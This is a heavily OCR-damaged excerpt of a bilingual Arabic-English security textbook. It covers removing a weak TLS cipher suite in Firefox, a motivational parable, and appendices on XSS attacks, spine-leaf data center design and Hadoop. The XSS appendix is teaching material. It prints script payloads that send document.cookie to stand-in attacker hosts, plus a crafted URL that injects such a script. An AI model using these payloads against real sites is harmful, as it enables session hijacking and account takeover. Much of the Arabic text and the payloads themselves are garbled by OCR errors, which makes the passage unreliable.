TLS ECDHE RSA WITH AES 128 CBC SHA(0xc013) Forward Secrecy 128 
TLS ECDHE RSA WITH AES 256 CBC SHA(0xc014) Forward Secrecy 256 
TLS DHE RSA WITH AES 128 CBC SHA(0x33) Forward Secrecy 128 
TLS DHE RSA WITH AES 256 CBC SHA(0x39) Forward Secrecy 256 
TLS RSA WITH AES 128 CBC SHA(0x2f) 128 
TLS RSA WITH AES 256 CBC SHA(0x35) 256 


TLS RSA WITH 3DES EDE CBC SHA(0xa) WEAK 


112 


(1) When a browser supports SSL 2, its SSL 2-only suites are shown only on the very first connection to this site. To see the suites, close all browser 


TLS DHE RSA WITH AES 256 CBC SHA(0x39) Forward Secrecy 


TLS RSA WITH AES 128 CBC SHA(0x2£) 


TLS RSA WITH AES 256 CBC SHA (0x35) 


TLS RSA WITH 3DES EDE CBC SHA(0xa) WEAK 


(1) When a browser supports SSL 2, its SSL 2-only suites are shown on 
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هل تتذكر هذا ال cipher suite‏ ..$ 


Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلومانه‎ 


إنه أحد ال cipher suites‏ التی قدمها التصفح إلى ال server‏ أثناء مرحلة ال handshake‏ عندما كنا تتحدث عن 


بروتوکول ال SSL‏ وأيضاً قام ال server‏ باختیاره!. 


فضلاً عن أنه لايدعم ال Forward Secrecy‏ فهو * ail‏ ضعیف !. 
سنقوم الآن بالغائه من البدائل التي يقوم real‏ الخاص بي بتقديمها باتباع الخطوات الموضحة بالشكل: 
ODE‏ 


Search: | ssl3 


Preference Name Status Type Value 
security.ssl3.rsa des ede3 sha boolean 
security.ssl3.dhe rsa aes 128 sha default boolean true 
security.ssl3.dhe rsa aes 256 sha default boolean true 
security.ssl3.ecdhe ecdsa aes 128 gcm sha256 default boolean true 
security.ssl3.ecdhe ecdsa aes 128 sha default boolean true 
security.ssl3.ecdhe ecdsa aes 256 gcm sha384 default boolean true 
security.ssl3.ecdhe ecdsa aes 256 sha default boolean true 
security.ssl3.ecdhe ecdsa chacha20 poly1305 sha256 default boolean true 
security.ssl3.ecdhe rsa aes 128 gcm sha256 default boolean true 
security.ssl3.ecdhe rsa aes 128 sha default boolean true 
security.ssl3.ecdhe rsa aes 256 gcm sha384 default boolean true 
security.ssl3.ecdhe rsa aes 256 sha default boolean true 
security.ssl3.ecdhe rsa chacha20 poly1305 sha256 default boolean true 
security.ssl3.rsa aes 128 sha default boolean true 
security.ssl3.rsa aes 256 sha default boolean true 


» ثم في خانة البحث نكتب SSL3‏ فيظهر لنا ال cipher suites‏ التي يدعمها 


< 


التصفح. فنقوم بإلغاء هذا ال cipher suite‏ الضعيف عن طريق جعل قيمته المناظرة ب False‏ 


نقوم بكتابة about:config‏ في الشريط 
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القرصنة الإلكترونية وأمن المعلوماءه 


والآن سنعود مرةً أخرى إلى 55118055 لنختبر ا صفح بعد هذا الاجراء لنتأكد من عدم ظهور هذا ال cipher suite‏ مع 


البدائل التي يدعمها المتصفح. 
هاهي النتائج» ولايوجد من بينها ال cipher suite‏ الضعيف!. 


ruya a M, 


ww.ssllabs.com/ssltest/viewMyClient.html Ec | | Q, Search 


rej Cipher Suites (in order of preference) 


TLS ECDHE ECDSA WITH, AES, 128 GCM SHA256 (0xc02b) Forward Secrecy 128 
TLS ECDHE RSA WITH AES 128 GCM SHA256 (0xc02f) Forward Secrecy 128 
TLS ECDHE ECDSA WITH CHACHA20 POLY1305 SHA256 (0xcca3) Forward Secrecy 256 
TLS ECDHE RSA WITH CHACHA20 POLY1305 SHA256 (0xcca8) Forward Secrecy 256 
TLS ECDHE ECDSA WITH AES 256 GCM, SHA384 (0xc02c) Forward Secrecy 256 
TLS ECDHE RSA WITH AES 256 GCM SHA384 (0xc030) Forward Secrecy 256 
TLS ECDHE ECDSA WITH AES 256 CBC SHA(0xc00a) Forward Sececy 256 
TLS ECDHE ECDSA WITH AES 128 CBC SHA(0xc009) Forward Secrecy 128 
TLS ECDHE RSA WITH AES 128 CBC SHA(0xc013) Forward Secrecy 128 
TLS ECDHE RSA WITH AES 256 CBC, SHA(0xc014) Forward Seaecy 256 
TLS DHE RSA WITH AES 128 CBC SHA(0x33) Forward Secrecy 128 
TLS DHE RSA WITH AES 256 CBC SHA(0x393) Forward Secrecy 256 
TLS RSA WITH AES 128 CBC SHA (0x22) 128 
TLS RSA WITH AES 256 CBC SHA (0x35) 256 


(1) When a browser supports SSL 2, its SSL 2-only suites are shown only on the very first connection to this site. To see the suites, close all browser 
windows, then open this exact page directly. Don't refresh. 


Protocol Details 

5 Server Name Indication (SNI) Yes 
Secure Renegotiation Yes 
TLS compression No 
Session tickets Yes 


إلى هنا نكون انتهينا من فقرة ال PFS‏ 


سننتقل oM‏ إلى آخر فقرة في هذا الباب» وهی بعنوان "Success Algorithms"‏ 
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Success Algorithms 


d 54 


بها أنك الآن أصبحت رجلا رقم بامتياز © دعني أقدم لك بعض الخوارزميات المختارة التي يكن اعتمدها 
لتکون دائم التَقدم إلى الأمام. 
La‏ بإطلاق لفظة "خوارزمية" عليها تماشياً مع موضوع هذا الباب, الذي كان الختام يكتتابي. 


سأحكى لك قصة من القصص الرائعة.. 


في يوم ما.. كان أحد (EA‏ الصوفيون en lS LAE‏ 

LS‏ أحدهم.. 

فقال: أيها العارف الکبیر.. QoS‏ على أساتيذك ومُعلّمِيك الذين استقیت منهم هذه الحكمة TÉJA‏ 
قال الشيخ: يابُني.. لو آردث ذلك لأخذنا شهوراً وراء شهور لأدُلكَ عليهم!ء وليس في الوقت مُتّسع!. 
قال الشاب: إذاً.. alia‏ على أهم أساتيذك!» على أروع مُعلّميك!. 

فقال الشيخ: نعم.. هم ثلاثة.. 

قال الشاب: ومن هم؟ 

فرد الشيخ: شم uad‏ وكلبء وطفل صغير!. 


وبدأ الشيخ يسرد له قصتهٌ مع هؤلاء العلمین BI‏ 
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عدت ذات يوم من uS 5 C ALII‏ قد ees ual‏ مفتاح داري عند جارة لي كبيرة في السن» فأحسست بالحرج من أن 
آوقظها في منتصف الليل. وبیتا آنا کذلك. إذا برجل يسألني: ماذا بك؟ 

قلت: أود أن أفتح بيتي وليس معي المفتاح!. 

قال: UT‏ آفتحه لك» فهذه صنعتي !. 

ففتحه ذاك الرجل بالفعل» 

فقال له الشيخ: إنزل fle‏ ضیف الليلة. 


فرد الرجل: على الرحب والسَعَة فليس عندي بيت من الأساس!. 


يقول الشيخ» فنزل de‏ ضيفاً لبضعة شهور!ء وكان cR‏ كل صباح باكراً باحثاً عن ed‏ یمود في آخر اليوم BE‏ 
اليدين» ولم يكن يعلم الشيخ أنه لص!. 

فقد كان dU,‏ وهو يستيقظ كل يوم بکل حيوية ونشاط وينطلق للسعي على رزقه» ثم gl‏ بلا «JU‏ 

وكان يسأله الشيخ: ماذا کسبت؟ فيرد عليه: لا de gh‏ غداً إنشاءالله يأتيني الرزق.. وهکذا.. 

فكان رجل عجيب!. لا ییس» لديه إقبال على الحياة وطموح عاليين!» لا يتضجر من القضاء والقدر!. 

قال الشيخ: فتعلمت aoe‏ الکثبر !. 


3 £O. 
وهذه أول خوارزمية للنجاح أهديها لك!..‎ 
عن كل‎ lo إليه من علوم أو معارف أو خبرات!» ابحث‎ LU ولا تطمئن‎ olo "لا تيأس".. إبذل مابوسعك‎ 


جديد ولا تركن إلى منطقة الراحة. 
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a‏ بعض الباحثين وجود علامة مُشتركة بين عدد من المخترعين والعُلّاء. وهي أنهم کانوا مُصابين بنوع من 
الأزمات النفسية وهي "عدم الرّضا عن آلفسهم "!۰ فكان يدفعهم هذا إلى البحث الستمر وبذل ال هد غير العادي» 
والسهر لساعاتٍ طوال بسبب عدم شعورهم بالرّضا عن نتائجهم NAS‏ 

فكانت هذه العُقدة النفسية سبباً في ظهور إنجازاتهم غير السبوقة! ونتائجهم All‏ 5 للدهشة!. 

لا رید آن cedes OS‏ مثل هولاء۱.. Q‏ 

ولکن رید التحلي ببعض الاصرار وبذل الجهد لتتمكن من التقدم للأمام دوما. 


لتعود إلى الشیخ الجليل... 


واستکمل الشیخ.. وأما الکلب.. فکان يُسابقني إلى جَذُوَلٍ ماء» فيه مق أي أنه عمیق بعض الشيء. 
فلا edel‏ ذلك الکلب إلى الْجَذُولء يبدو أنه ری صورته في LU‏ 

ONE العطش غلبك فعاد.. ثم ارتد فزعاً.. وهكذا لعدة‎ S] فابتعد..‎ le sis 

إلى OF‏ غلبة العطش فألقى بنفسه في الماء!. 


قال.. فتعلمتٌ من هذا الكلب.. أن أكثر معاركناء وأكثر صراعاتناء وأكثر خاوفنا هي ólagi‏ 
نخلقها ثم سقطها على الواقع وتُصدّقها!. 

هذه الخاوف هی الى تسا هی E‏ بالاعیاء!. 

وهذه هي الخوارزمية الثانية للنجاح.. 
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لا dà 25 Ss CE‏ أقبل HEY,‏ 
مُعظم الأمور تبدو صعبة في بدايتهاء لكن بالتحلي ببعض الشجاعة والحكمه يُمكن CES‏ على الصعُوبات ثم EI‏ 


3 


إلى ما وراءهاء وهكذا.. كلا حَقَقتَ a‏ احتفل به» وافرح به!» ثم انتقل إلى الذي يّليه!. 


discas كثيرة‎ ce YS 
والأفضل من معرفتها ودراستها.. هو تطبیق ما تعرفة منها أولا!.‎ 
iet ولا کف این‎ 
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3 و ۶ ¢ 0 
cl‏ أن اهنئك.. 


لقد وصلت إلى Ue‏ هذا الكتاب بحمد الله تعال.. 


آقنی of‏ یکون قد JU‏ اعجابك.. 
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Appendixes 


(A), (B) and (C) 


XSS 
Attacks 


CROSS SITE SCRIPTING 


73 


یعتم ال XSS‏ شكل من أشكال ال Injection Attacks‏ 
نقوم بتعریف ال injection exploits‏ على Gl‏ الثغرات التی تستخدم خاصية ال input‏ أو ال data entry‏ ليتم إدخال 


كود Vs‏ من إدخال ال data‏ الطلوبق فینتج بذلك تغيير أو تخريب iab J‏ هذه ال „operation‏ 


: bl injection attacks من أمثلة ال‎ 
SQL injection, DOM injection, & XSS 


f. XSS ماهذا ال‎ 


Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious 
JavaScript in another user's browser. 
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كيف يتم هذا؟ 

لا يقوم ال Attacker‏ باختراق user‏ بعينه!» ley‏ يقوم باستغلال ثغرة في ال Website‏ الذي سيقوم ال user‏ بزيارته. 
حينها یستخدم ال Attacker‏ هذا الوقع كأداة لتوصيل ال malicious code‏ إلى ال user‏ الذي يتصفح الموقع. 
ویتعامل ال browser‏ اخاص user JL‏ مع ال malicious code‏ على * جزء من الوقع ولا پلاحظ أنه كود مشبوه!. 


هذا هو التعريف الشهير لأول نوع من ال XSS‏ وهو ال "Persistent XSS"‏ وغالباً يتم كتابة هذا الکود 3 BAI‏ 


كيف يقوم ال Attacker‏ بعمل lis inject‏ ال code‏ داخل صفحات الموقع؟ 
في حالة I3]‏ کان الموقع يحتوي عل آي نوع من آنواع ال ."user inputs"‏ 
SUN e.‏ 


لنفرض آن tol‏ صفحات موقع ما تحتوي على Script‏ وظیفته عرض تعليقات الزوار» وتحديد 
شكل هذا ال de |S Script‏ : 


print > htmi>" 
print "Last comment:" 
print db.lastComment 
print "«/html»" 


هذا ال Script‏ سيقو م بعمل access‏ إلى ال Data Base‏ الخاصة بتعليقات الزوّار ليلتقط منها آخر ی e‏ يعرضه 
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كيف يستغل ال Attacker‏ هذا ال Script‏ لودراج الكود الخاص $a,‏ 
gas‏ ال Attacker‏ نفسه آحد الزوّار» e$‏ بدلاً من إرسال تعليق سيقوم بإرسال كود» هذا الكود سيتم تخزينه في 
قاعدة البيانات "مال" تم يتم عرض هذا التعليق الأخير (الكود) لآي user‏ يفتح هذه الصفحة. 
لنشاهد ما سبتلقاه آي user‏ بعد إرسال الكود. 
<html>‏ 
Latest comment:‏ 


<script>...</script> 
</html> 


النقاط التى بين ال p <Script></Script> Tags‏ عن ال malicious code‏ هذا الكود ربا تكون وظيفته 


الوصول إلى ال Cookie‏ الخاصة lie‏ ال user‏ ونسخها 4 إرساطا إلى ال .Attacker‏ 


بعض الآثار i‏ على وقوع أحدهم ضحية لل malicious code‏ 

Cookies سَرِقَة ال‎ e] 

يقوم ال Attacker‏ بتضمين کو د دما الأمر document.cookie‏ في أحد ال input forums‏ فيتمكن مذا 
الحصول على ال cookie‏ الخاصة gl‏ زائر هذه الصفحة. 

2 - سرقة Molds‏ 59 عن طريق ال .Keylogging‏ 

یقوم ال attacker‏ هنا بزرع keyboard event listener‏ باستخدام الأمر addEventListener‏ 


ليتم إرسال مايتم کتابته بالكيبورد إلى ال Server‏ الخاص „Attacker JL‏ 
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XSS Attack types: 


Persistent XSS 
where the malicious string originates from the website's database. 


Reflected XSS 
where the malicious string originates from the victim's request. 


DOM-based XSS 


where the vulnerability is in the client-side code rather than Server-side code. 


Persistent XSS 
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POST http://website/post-comment 


Website 


Attacker 


Attacker's Browser 
Attacker's Server g d 
Website's Response Script 


print "<html>" 
print "Latest comment: ” 
print database.latestComment 


Website's Database 
latestComment: «script»window.location-'http://attacker/ 
?cookie-' «document. cookie«/script» 


<script>...</script> 


print "</html>" 
ud GET http://attacker/?cookie-sensitive-data 


Website's Response to Victim GET http://website/latest-comment 


Victim's Browser 


200 OK 


<html> 
Latest comment: 
ript» 


window.location-'http://attacker/?cookie-'«document.cookie 
dist" 
Created by Jakob Kallin and Irene Lobo Valbuena 


)1( يقوم ال attacker‏ باستغلال أحد ال input forums‏ في الوقع لیقوم بادخال malicious string‏ إليه عن 


.Post method طريق‎ 


ماهذا ال $..Post method‏ 
في البداية نقوم بتعريف ال HTTP‏ على أنه البروتوکول الأساسي الذي ax‏ بوابتك لدخول ال WWW‏ يستخدم هذا 
البمروتوكول نظام ثابت في عملية التواصل بين ال clients‏ وال «server‏ وهی ال ee «"Message based system”‏ 
يقوم فيها ال client‏ بإرسال «request‏ ويقوم ال server‏ بالرّد عليه response‏ من أشهر ال methods‏ التى يتعامل 


.Post وال‎ «Get هی ال‎ J 5S ji » JI مها هذا‎ 
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تستخدم ال Get‏ عندما يقوم ال client‏ بطلب resource‏ بعینه من ال «(Retrieve a resource) «server‏ ( 
تُستخدّم ال Post‏ لتقو e‏ بعمل Action‏ ما.. (to perform action)‏ 


مثال لعملية ال «post‏ قيامك بالضغط على hs send‏ بعد ملیع forum‏ ما أو أثناء إجراء عملية بحث. 


)2( يقوم أي user‏ عشوائی هنا بطلب هذه الصفحة من الوقع» لاحظ استخدام -Get method‏ 
)3( یقوم الوقع بعمل Response‏ لل victim‏ بإرسال الصفحة وما ال malicious string‏ التى قام ال attacker‏ بإدخاها 


إلى قاعدة البيانات في الخطوة الأولى. لاحظ الرقم 200 3( ال response‏ وهو یعنی مايل: 


it means that the request was successful, and that the requested resource is being returned. 


)4( يقوم ال victim's browser‏ بتنفيذ ال malicious code‏ وهو عبارة عن كود لنسخ ال 
Session cookie‏ الخاص victim JL‏ وإرساله إلى Server‏ خض ال „attacker‏ 


ومالذى سيستفيده ال attacker‏ بعد أخذ هذا ال cookie‏ مهزووء5. . ؟ 


سيقوم بعدها بالتعامل مع هذا الموقع على أنه 5a‏ هذا ال 0710113 أي أنه سيتمكن من انتحال شخصية هذا ال „user‏ 


لقد فهمنا النوع الأول من ثغرات ال XSS‏ 


سننتقل لتوضيح النوع الثاني وبه نختم هذا الوضوع 
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Reflected XSS 


مايل مثال من the web application hacker's handbook OLS‏ اخترتة لك. 


Application 


5. Attacker's : 
JavaScript i 2. Attacker feeds crafted URL to user sd 
executes 6. User’s browser sends session token to attacker ف‎ 
user's browser ye Y > 
User Attacker 


The steps involved in a reflected XSS attack 
"Session Token" على الإنترنت» ويحصل على ال‎ web applications لأحد ال‎ Login بعمل‎ user يقوم ال‎ (1) 


الخاصة ذه العملية. 
وماهذا ال $..Session token‏ 
ذكرنا من قبل أن بروتوكو ل ال «Stateless protocol Ja HTTP‏ ويعتمد على ال IS .request-response model‏ 


۰ E 7.2 
"independent transaction" يعتبرهم‎ response و‎ request 
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وبالتالي لا يملك ال HTTP‏ طريقة أو mechanism‏ ليقوم بربط سلسلة من ال requests‏ الخاصة ب user‏ بعینه!. 
وبالنظر إلى مواقع الانترنت الان» ستجد pad Lef‏ لك خدمة ال dogin‏ وخدمة الشراء الالکترونی» وأيضاً تقوم هذه 
الواقع Cad SS‏ به لديهم في الزيارات الماضية. 

فكيف تقوم المواقع بهذا الأمر؟ 

لتحقيق أي من هذه الخدمات» ستحتاج هذه المواقع تطبيق مبداً تُطلق عليه “Session”‏ 


لاحظ ol‏ عدم وجود ال Session‏ سيجعل عملية ال login‏ مثلاً تتكرر في كل صفحة أو كل request‏ جديد! . 


فا وظيفة هذه ال €(3I Session‏ 

بعد آن یقوم ال user‏ بتسجیل الدخول» يقوم الوقع بفتح Session‏ لهذا ال e «user‏ يتعامل مع بقية ال requests‏ التي 
تتم داخل هذه ال session‏ على Lal‏ تتبع هذا ال .user‏ 

وبالتالي don‏ الوقع ost‏ من ol‏ سلسلة ال requests‏ هذه قادمة من هذا ال user‏ تحديداً!» وليس أحد غيره. وهذا 
st‏ يتم باستخدام ال "Session Token"‏ 

فا هذا ال Token‏ ..$ 

لکل user‏ یفتح Session‏ مع الوقع» يتم إعطاؤه رقم عشوائي Session ID (ous‏ أو «Token‏ وعندما يبدأ هذا ال 
user‏ بإرسال request‏ جديد أو الانتقال لصفحة أخرى فيقوم بتضمين هذا ال ID‏ في ال crequest‏ فيتمكن حينها 


الموقع من ربط هذا ال request‏ بالذي قبله» ومن e‏ التحقق من هذا ال „user‏ 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلومانه‎ 


)2( يقوم ال Attacker‏ هنا بإرسال كود داخل "message error"‏ يظهر أمام ال victim‏ فيضغط عليه دون تدقيق في 


معناه!. هذا مثال على مايظهر لل :user‏ 


Message from webpage X] 


هذا الكود عبارة عن request‏ سيطلبه ال Victim‏ من الموقع ob‏ پرسل له الوقع ال cookie‏ أو ال Session ID‏ 


الخاص به» ويتم تحويله إلى ال server‏ الخاص بال „attacker‏ کایلی: 


http://website.net/error/5/Error.ashx?message=<script>varti=new+Image; 
ti.src-"http://serverattacker.net/"£2bdocument.cookie;«/script» 


)3( يبدأ ال user‏ بارسال ال request‏ الغير أخلاقى 
)4( يقوم JU d»‏ > على ال JU. 5b victim‏ ال .4JI session ID‏ 


)5( يبدأ ال victim's browser‏ بتنفيذ javascript code JI‏ التالى: 


Xscript»varti-newtImage;ti.src-"http://serverattacker.net/"£2bdocument 
.cookie;</script> 
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)6( پرسل ال victim‏ ال Session ID‏ إلى ال Attacker‏ عن طريق عمل request‏ إلى ال server‏ الخاص بال «attacker‏ 
هذا ال request‏ يتضمّن ال Session Token‏ الخاصة victim JL‏ 


مايل شكل لهذا ال ‘request‏ 
لاحظ ال session id‏ 


GET /sessIid-184a9138ed37374201a4c9672362£12459c2a652491a3 HTTP/1.1 
Host: serverattacker.net 


)7( يستخدم ال attacker‏ هذا ال session id‏ ويتعامل مع الموقع Sed‏ شخصية ال victim‏ . 


Appendix (B) 


Spine & Leaf Architecture Vs Traditional Data 
Center Architecture 
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مع انتشار تکنولوجیا ال Virtualization‏ وال «Cloud Computing‏ وال Distributed Cloud‏ مثل تكنولوجيا ال 
Hadoop‏ في بيئة ال Data Center‏ .. بدأت الحاجة الفعلية لزید من cole all‏ وإلى السرعات العالية في نقل البيانات 
والتي i‏ پثبت ال Traditional Architecture‏ الكفاءة ها 

فبدأت الحاجة لابتکار Architecture‏ أو Model‏ جديد وموفر في نفس الوقت. فکانت الحاجة pb)‏ ر Architecture‏ 


جَدید ليحل محل النظام التقليدي “Three-Tier Networking Model"‏ 
ما هذا ال <S. A *Hadoop"‏ 
كي آفهم bU‏ سنحتاج ل Network Architecture‏ جديد Rec‏ من التعامل معه!. 


o é a‏ ال Hadoop‏ في انح الأخير» Appendix (C)‏ تستطيع الإنتقال إليه إن شئت. 


¢..“Three-Tier Networking Model” وما هذا ال‎ 


هاهو.. 
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Understanding Hacking and Information Security المعلوماره‎ aly القرصنة الإلكترونية‎ 


/ Core 


/ " Aggregation 


/ Access 


Core Layer 

Core Layer is considered as the back bone of networks, The Core Layer routers move 
information on the network as fast as possible. 

Core Layer consists of biggest, fastest, and most expensive routers with the highest model 
numbers. 


Aggregation Layer 

The purpose of this layer is to provide boundary definition by implementing access lists and 
other filters. Therefore the Distribution Layer defines policy for the network. Distribution Layer 
includes layer 3 switches. it ensures that packets are properly routed between subnets and 
VLANs in the enterprise. 
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Access Layer 
Access layer switches ensures that packets are delivered to the end devices, 
It includes Access Switches which are connected to the end devices (Computers, and Servers). 


سنقوم بتوضيح نوعين من ال Traffic Patterns‏ التعارف عليهم في ال .Data Center‏ 
النوع الأول: 


North-South Traffic 
“Client-Server Traffic” عليه أيضاً‎ aE Traffic هذا النوع من ال‎ 


Traffic between Data Center and any thing else outside, (Traffic that travels in and out of the 
data center). 


هذه بعض الأمثلة عليه.. 

ال Traffic‏ الخاص بال -HTTP/HTTPs‏ أو ال Exchange‏ أو ال .SharePoint‏ 

يتضح أن ال Network Model‏ الذي تكلمنا عنه بالأعلى يثبت كفاءة جيدة في التعامل مع مثل هذه الأنواع 
من ال Traffic‏ التي تكون في الأغلب بين ال Remote Clients‏ وال Servers‏ بداخل ال .Data Center‏ هذا 
ال Network Model‏ مَبني على مبداً ال akts Redundancy‏ في حالة حدوث أي خلل أو كما نقول: 
“Resiliency against any failure”‏ وذلك عن طريق تفعيل ال .Spanning Tree Protocol‏ 

ولكن عند تفعيل هذا البروتوكول ينتج عن ذلك cz‏ ل 5096 من ال |S Network Links‏ يظهر بالشكل بالصفحة 


الماضية. 
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هذه ال Links‏ التي حدث لما U Blocking‏ ميزة وعيب في ذات الوقت!. 

الميزة أا ستمنع حدوث Looping‏ في الشبكة» سيق تكون ك Backup‏ يتم تفعيلة في حالة حدوث Failure‏ لأي 
Link‏ فعال. والعيب أنها be peo‏ من 50% من ال Bandwidth‏ المار داخل الشبكة بسبب تعطيل هذه اللينكات!. 
سننتقل إلى النوع الثاني من ال Traffic‏ وشاهد كيف سيتعامل ال 


Traditional Network Model‏ معه!. 


East-West Traffic 
آخر من‎ Pattern بدأ المسار يتجه ل‎ Distributed Cloud وال‎ Virtualization كال‎ cihat مع ظهور التكنولوجيا‎ 


ال Traffic‏ وهو ال -East-West‏ و oli‏ عليه c" Server-to-Server Traffic” Lal‏ وهو ال Traffic‏ الحادث داخل 
ال Data Center‏ ذاتها. فلو فرضنا وجود Server‏ متصل Access Switch JL‏ الموجود في أقصى الیسار» يريد أن 


يتواصل مع Server‏ آخر متصل cii Access Switch JL‏ بأقصى اليمين» فکیف سيتم ذلك؟ 


Access 


ستقوم ال Packet‏ بأخذ مسار لأعلى إلى ال Core Routers‏ ومن e‏ لأسفل c pip‏ كى تصل إلى ال Switch‏ 


à M‏ أقصى اليمين!. وهذا يؤدي لمزيد من ال Latency‏ وهدر لل Bandwidth‏ بالشبكة!. 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلومانه‎ 


وبفرض وجود Cluster of Servers‏ (نتكلم هنا عن مئات من ال (Servers‏ التي تقوم بعمل Calculations in‏ 
|S parallel‏ في حالة استخدام ال Apache Hadoop‏ على سبيل الثال فلن تتحمل الشبكة Gu‏ أي نقص في JI‏ 
Bandwidth‏ أو à‏ ال .Latency‏ وهذا OY‏ ال Servers‏ هنا ستحتاج لعملیات تواصل "^o‏ فيا بينها داخل ال 
Cluster‏ !. فإذا جتنا لتطبيق هذا الأمر باستخدام ال Traditional Model‏ وهو ال <Three-tier Architecture‏ 


فنکون lie‏ $2( لضياع ال Business‏ المرجو من وراء هذا العَمّل. 


الانتقال إلى ال “Spine-Leaf Architecture”‏ 


/ 3 Spine 


d 
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یتکون هذا ال Architecture‏ من جزتین أساسين, هم de‏ 

"Spine Switches, and Leaf Switches" 

هذه ال ¿K Spine Switches‏ اعتبارها طبقة Spine JU Core JI‏ عبارة عن: 
High-Throughput Layer 3 Switch‏ 


sal P ds‏ تَصِوّر طبقة ال Leaf‏ على انا ال «Access Layer‏ فهی (Connection Points) JI ka po‏ لل 


Spine Switches إلى ال‎ Uplinks نا قتلك ال‎ |S «Servers 


يبدو و اضعا من هذا ال ol Architecture‏ كل Leaf Switch‏ متصل بجميع ال .Spine Switches‏ 


“Every Leaf switch is connected to every Spine switch” 

ولکن ماذا يعني هذا؟ 

هذا يعني أنه لأي Server‏ يود التواصل مع أي Server‏ آخر Migs‏ مساراً ثابتاً وواضحاً!ء سیقوم بالصعود إلى ال 
Spine‏ < النزول إلى ال Leaf‏ الموصول ذا ال Server‏ 

(يُستثنى من ذلك ال deel! Servers‏ بتفس ال Leaf Switch‏ حيث لن تکون بحاجة إلى الصعود إلى ال Spine‏ 


حينها). 


هذا ال Architecture‏ يعمل بكفاءة عالية في حالة ال “East-West Traffic Pattern"‏ لقيامه بتفعيل كامل ال 


-Bandwidth وتلاف احدر الحادث في ال‎ Network Resources 
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Appendix (C) 


هو عبارة عن "Open-Source Software Framework"‏ قامت بتطويره Apache Foundation‏ . 
يستطيع ال Hadoop‏ عمل Processing‏ للأحجام الضخمة من البیانات كبلك الخاصة بقواعد بيانات محر البَبحث 
الشهير «Google‏ أو ببيانات ال Applications‏ الكبيرة كالفيسبوك. يقوم ال Hadoop‏ بمعالحة وتوزيع هذه البيانات 


العملاقة على ال Hardware‏ باستخدام تكنولوجيا ال Distributed Computing‏ 


ماهذا ال Distributed Computing‏ ..؟ 


Distributed computing is a model in which components of a software system are shared among 
multiple computers to improve efficiency and performance. 


pes «|‏ عن عملية تشغيل Application‏ أو System‏ ماء على مجموعة من الأجهزة Vou‏ من جهاز واحد!ء هذه 
الأجهزة 2.3( ..Nodes‏ هذه ال Nodes‏ تكون مُرتبطة ببعضها داخل شبكة.. هذه الشبكة من الأجهزة LI JM‏ 
..Cluster Pe‏ هذا ال Cluster‏ اا “Cluster Computing”‏ إذا كانت الشبكة محلية (LAN)‏ و al‏ عليه 
"Grid Computing"‏ في حالة إذا كان ال Distributed Computing‏ مو Ó‏ على ال (WAN)‏ نستخدم Las‏ مبدأ ال 
Distributed Computing‏ في ال Computational Problems‏ الكبيرة» و التي لا يمكن لجهاز وحيد استیعاما!» فيتم 
تقسيم هذه ال Process‏ آو ال Problem‏ إلى جموعة من ال Tasks‏ آو الهای يتم توزيعها على جموعة من ال «Nodes‏ 
هذه ال Nodes‏ لديها القابلية للتواصل مع بعضها البعض كما يظهر بالشكل. 
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هذا التواصل يتم باستخدام تكنيك يسمى .."Message Passing"‏ 

هذا ال Message Passing‏ يُستخدم في العديد من تطبيقات الكمبيوتر الحديثة c use‏ لل Objects‏ الکونة هذا ال 
is 5 Al Software‏ على ال Nodes‏ بإمكانية التواصل مع بعضها بأسلوب ذكي وسریع» عوضاً عن الأسلوب 
التقليدي Call ei ob‏ لل Program‏ باسمه!. مئل الأسهم الطويلة نسبياً التي تربط بين ال Nodes‏ في الجهة 


السرى عملية ال Message Passing‏ بينهم. 


Distributed Computing 


Parallel Computing 


" يظهر على اليمين النظام البسیط وهو ال ‘Parallel Computing‏ ثلاحظ وجود Shared Memory‏ يتشارك ما 
جموعة من اجات .Multiprocessor‏ 
* بنا على اليسار يبدو أنه Distributed Memory System‏ ويُشير الإطار kadi‏ بكل Node‏ إلى أنه جهاز مُستقل!ء 


وهذا ما 4X.‏ بال .Multicomputer‏ 
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لنعود إلى ال Hadoop‏ من جديد. 

ol tá‏ ال e à Hadoop‏ بتقسيم ال Big Data‏ إلى Blocks‏ هذه ال Blocks‏ يتم تخزينها في الأجهزة المورّعة على ال 
Clusters‏ وبزيادة عدد ال «Nodes‏ تزيد سرعة idles‏ هذه ال Lad «Big Data‏ عند حدوث خلل أو à cals‏ أحد 
ال «Nodes‏ لن Sb;‏ ال Application‏ أو ال Data‏ بسبب عملية النقل الأوتوماتيكي لهذا ال Load‏ إلى أي Node‏ 
خرى في ال Cluster‏ كما أنه يقوم بعمل أكثر من سخة من البيانات حتى يتمكن من استرجاعها في حالة حدوث أي 


فقد. وهذا ما نُسميه “High Availability” JU‏ 


0 
| 


PIE 


EJ 
. “Load Balancing" لعملية ال‎ alaa Computer Cluster ة لل‎ Peat من التصائص الاخری‎ 


$..*Load Balancing" ماهذا ال‎ 


مايل تعريف الويكيبيديا له: 
load balancing improves the distribution of workloads across multiple computing resources, such‏ 
as computers, a computer cluster, network links, central processing units, or disk drives. Load‏ 


balancing aims to optimize resource use, maximize throughput, minimize response time, and 
avoid overload of any single resource. 


هذا ال Hadoop Framework‏ في الأساس عبارة عن جزئين رئيسيين: 
- الجزء الأول وهو الخاص بال "Storage"‏ أو التخزين» ويُطلّق عليه (HFS)‏ سنأتي إليه بعد قليل.. 


.(MapReduce) ویسمّی‎ "Processing" البيانات‎ it Lå teal والجزء الثاني هو‎ - 


سنوضح وظيفة هذه ال isi Core Modules‏ لل .Hadoop‏ 
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Hadoop Common 
Modules التى ستحتاجها 4,4 ال‎ Utilities وال‎ Libraries هذا الجزء يحتوي على ال‎ 


Hadoop Distributed File System (HDFS) 
لأنه سيقوم بعملية‎ Scalability JU يتميز‎ System هذا ال‎ Java ال‎ real we System عن‎ à Le Module هذا ال‎ 


- " 


تخزين ال Big Data‏ على العديد من الأجهزة «(Across multiple machines)‏ هذا التخزين سيكون بشكل 


عشوائي أي أنه لنّ يتم عمل ois Organize‏ ال Data‏ قبل هذا الإجراء!. 
Hadoop MapReduce‏ 
هذا الجزء عبارة عن «Programming Model‏ هو في الأصل Software‏ .. تتلخص وظيفته في عمل Processing‏ 
لكميات ضَحْمّة من ال Data‏ 
Hadoop YARN‏ 


هذه عبارة عن Platform‏ تقوم بعمل Management‏ لل «Resources‏ هذه ال Resources‏ هى ال Computing‏ 


